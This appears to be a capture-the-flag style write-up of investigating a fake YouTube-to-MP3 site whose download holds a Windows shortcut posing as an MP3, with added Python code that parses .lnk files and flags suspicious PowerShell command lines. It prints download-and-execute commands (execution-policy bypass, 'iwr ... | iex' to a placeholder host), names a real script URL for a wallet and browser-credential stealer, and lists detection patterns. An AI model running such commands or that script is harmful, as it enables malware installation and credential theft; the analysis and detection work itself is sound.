Investigating a Potentially Malicious YouTube to MP3 Converter Website
In the bustling digital world, where innovation often walks hand in hand with deception, McSkidy, a seasoned SOC analyst, found herself intrigued by whispers about a trending YouTube to MP3 converter website. Renowned for its sleek design and seamless functionality, it had gained rapid popularity among unsuspecting users. But McSkidy’s instincts told her that something was amiss.
The website’s meteoric rise seemed too convenient, and subtle inconsistencies in its operations suggested a darker narrative lurking beneath the surface. Armed with her investigative skills and a drive to uncover the truth, McSkidy decided to dig deeper. What began as a casual inquiry into an online tool soon unraveled into a complex web of malicious activity, poor OPSEC practices, and an overconfident adversary hiding in plain sight.
1. The Initial Investigation
The website, accessed via a browser, presents a professional-looking interface. The About Page attributes its creation to "The Glitch," seemingly simplifying attribution. It even claims to be "Secure" and "Safe" in its feature list, which immediately raises suspicions.
YouTube to MP3 Converters: Risks Galore
These tools have a notorious history of hosting significant risks:
Malvertising: Malicious ads exploit system vulnerabilities.
Phishing Scams: Users are lured into sharing sensitive information.
Bundled Malware: Files come with hidden, malicious payloads.
2. Downloading the Files
Testing the site involves submitting a YouTube link (e.g., https://www.youtube.com/watch?v=dQw4w9WgXcQ).
After downloading, we extract a download.zip file containing two files, song.mp3 and somg.mp3.
Analyzing the Files
File 1: song.mp3
Running the file command on it reveals a legitimate MP3 file:
Audio file with ID3 version 2.3.0, MPEG ADTS, layer III
File 2: somg.mp3
On running file somg.mp3, we discover:
MS Windows shortcut, with command line arguments
The file masquerades as an MP3 by its extension but is actually a Windows shortcut file (.lnk), a format that can carry a target program and command-line arguments, so opening it executes commands instead of playing audio.
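The extension/content mismatch that the file command caught is worth automating, since it is the whole trick here. The following added example (not part of the original write-up) classifies files by their leading bytes rather than their name, flags a mismatch, and then walks the Shell Link (.lnk) structure to pull out the COMMAND_LINE_ARGUMENTS string, which is the same field exiftool surfaces. The two sample files, the hypothetical placeholder URL example.invalid and the argument string are constructed for the demonstration; the header layout follows the public MS-SHLLINK specification.

```python
import struct
from typing import Optional

# Every Shell Link file starts with HeaderSize 0x4C followed by the fixed LinkCLSID
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
LNK_MAGIC = b"\x4c\x00\x00\x00" + LNK_CLSID

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional sections follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80


def sniff_type(data: bytes) -> str:
    """Classify by leading bytes only; the file name is never consulted."""
    if data.startswith(LNK_MAGIC):
        return "lnk"
    if data.startswith(b"ID3"):
        return "mp3"                      # ID3v2 tag, as on the real song.mp3
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3"                      # raw MPEG audio frame sync, no ID3 tag
    return "unknown"


def extension_mismatch(name: str, data: bytes) -> bool:
    """True when the extension promises one format and the bytes are another."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind = sniff_type(data)
    return kind != "unknown" and ext != kind


def lnk_arguments(data: bytes) -> Optional[str]:
    """Return the COMMAND_LINE_ARGUMENTS string of a Shell Link, or None if absent."""
    if not data.startswith(LNK_MAGIC):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]   # LinkFlags sits right after the CLSID
    pos = 76                                        # fixed ShellLinkHeader size
    if flags & HAS_LINK_TARGET_ID_LIST:             # skip IDList: uint16 size + that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                       # skip LinkInfo: uint32 size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    # StringData sections appear in this fixed order, each present only if its flag is set
    for bit in (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, not bytes
        pos += 2
        raw = data[pos:pos + count * width]
        pos += count * width
        if bit == HAS_ARGUMENTS:
            return raw.decode("utf-16-le" if width == 2 else "cp1252")
    return None


def build_sample_lnk(args: str) -> bytes:
    """Constructed minimal .lnk: header with HasArguments|IsUnicode and one ARGUMENTS string."""
    header = bytearray(76)
    header[0:4] = b"\x4c\x00\x00\x00"
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 20, HAS_ARGUMENTS | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(args)) + args.encode("utf-16-le")


# Constructed stand-ins for the two extracted files (placeholder URL, not the real one)
SAMPLES = {
    "song.mp3": b"ID3\x03\x00" + b"\x00" * 11,
    "somg.mp3": build_sample_lnk(
        '-ExecutionPolicy Bypass -Command "iwr https://example.invalid/placeholder.ps1 | iex"'
    ),
}


def triage(samples=SAMPLES) -> dict:
    """Per-file verdict: sniffed type, extension mismatch, and embedded arguments for .lnk."""
    findings = {}
    for name, data in samples.items():
        kind = sniff_type(data)
        entry = {"type": kind, "mismatch": extension_mismatch(name, data)}
        if kind == "lnk":
            entry["arguments"] = lnk_arguments(data)
        findings[name] = entry
    return findings


if __name__ == "__main__":
    for name, finding in triage().items():
        print(name, finding)
```

The parser deliberately stops once it has the arguments string; the trailing ExtraData blocks can hold more (environment variables, a tracker GUID) but are not needed to answer the question the investigation asks, namely what the shortcut runs.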
3. Digging Deeper with ExifTool
Running exiftool somg.mp3, we uncover:
The embedded command bypasses PowerShell's execution policy, downloads a malicious script from https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1, and executes it in the same step.
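From a SOC seat, the combination just described (execution policy bypass, remote download, immediate execution, often with a hidden window) is the thing to alert on in process-creation telemetry, regardless of which shortcut or URL delivered it. The following added example, not part of the original write-up, scores PowerShell command lines from constructed Sysmon-style JSON events against those indicators and also decodes a base64 -EncodedCommand argument so the indicators are re-checked on the decoded text. The four sample events, the placeholder URL example.invalid, the encoded sample (which decodes to a harmless Start-Sleep) and the weights are all assumptions for the demonstration.

```python
import base64
import json
import re

# Indicator regexes run case-insensitively over the raw command line; weights are a judgement call.
# PowerShell accepts unambiguous prefixes of its switches (-ep, -exec, -w, -nop), hence the [a-z]* tails.
INDICATORS = {
    "exec_policy_bypass": (re.compile(r"-e[a-z]*\s+(bypass|unrestricted)", re.I), 2),
    "hidden_window":      (re.compile(r"-w[a-z]*\s+hidden", re.I), 1),
    "no_profile":         (re.compile(r"-nop\w*", re.I), 1),
    "remote_download":    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                                      r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer", re.I), 2),
    "invoke_expression":  (re.compile(r"\biex\b|invoke-expression", re.I), 2),
    "encoded_command":    (re.compile(r"-e[a-z]*\s+[a-z0-9+/=]{20,}", re.I), 2),
}
# Captures the base64 payload of -e/-enc/-EncodedCommand so it can be decoded and rescanned
ENCODED_RX = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)


def analyze_command(cmdline: str) -> dict:
    """Return indicator hits, a decoded -EncodedCommand payload if any, and a total score."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    decoded = None
    m = ENCODED_RX.search(cmdline)
    if m:
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")  # PowerShell encodes UTF-16LE
        except (ValueError, UnicodeDecodeError):
            decoded = None
        if decoded:
            hits += [f"decoded:{n}" for n, (rx, _) in INDICATORS.items()
                     if n != "encoded_command" and rx.search(decoded)]
    names = {h.split(":")[-1] for h in hits}
    score = sum(INDICATORS[h.split(":")[-1]][1] for h in hits)
    # download-and-execute on one line is the pattern from this investigation: weigh the pair extra
    if {"remote_download", "invoke_expression"} <= names:
        score += 3
    return {"score": score, "hits": hits, "decoded": decoded}


def triage_events(raw_lines, threshold: int = 6) -> list:
    """Parse JSON process-creation events and return those whose command line scores >= threshold."""
    alerts = []
    for line in raw_lines:
        ev = json.loads(line)
        result = analyze_command(ev.get("CommandLine", ""))
        if result["score"] >= threshold:
            alerts.append({"image": ev.get("Image"), "parent": ev.get("ParentImage"), **result})
    return alerts


# Constructed Sysmon Event ID 1 style records (raw strings so the JSON escapes survive as written)
SAMPLE_EVENTS = [
    r'{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -ep Bypass -nop -w hidden -c \"iwr -useb https://example.invalid/placeholder.ps1 | iex\""}',
    r'{"EventID":1,"ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"}',
    r'{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -Command Get-Process | Sort-Object CPU"}',
    r'{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQAwAA=="}',
]


if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print(alert["score"], alert["parent"], "->", alert["image"], alert["hits"])
```

Only the first event crosses the threshold; the nightly backup script and the interactive Get-Process call score low by design, and the encoded event is surfaced with its decoded content so an analyst can see at a glance that it is benign. A parent of explorer.exe with a PowerShell child is exactly what a double-clicked shortcut produces, so the parent field is kept in the alert for that context.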
Examining the PowerShell Script
The script, fetched from https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1, collects sensitive information, including:
Cryptocurrency Wallets
Browser Credentials
The signature "Created by the one and only M.M." is embedded, providing a crucial lead.
Tracing MM on GitHub
Searching for "Created by the one and only M.M." on GitHub reveals repositories linked to MM's handle.
This OPSEC failure leads us to incriminating evidence:
MM’s GitHub activity reveals their involvement.
A single commit in the repository exposes their role in crafting the malicious script.
The Lessons: OPSEC and Attribution
This case underscores the importance of Operational Security (OPSEC) for both attackers and defenders: the same mistakes that exposed MM here are the ones an investigator should look for first. Some common mistakes include:
Reusing handles or email addresses.
Including identifiable metadata in code.
Failing to anonymize online activities.
Real-World OPSEC Fails
AlphaBay Admin Takedown: Reused email and usernames linked Alexandre Cazes to the dark web marketplace.
APT1 Chinese Hackers: Predictable naming and time-based patterns exposed their identity.
Conclusion
This investigation highlights how seemingly minor breadcrumbs can unravel a malicious actor's identity.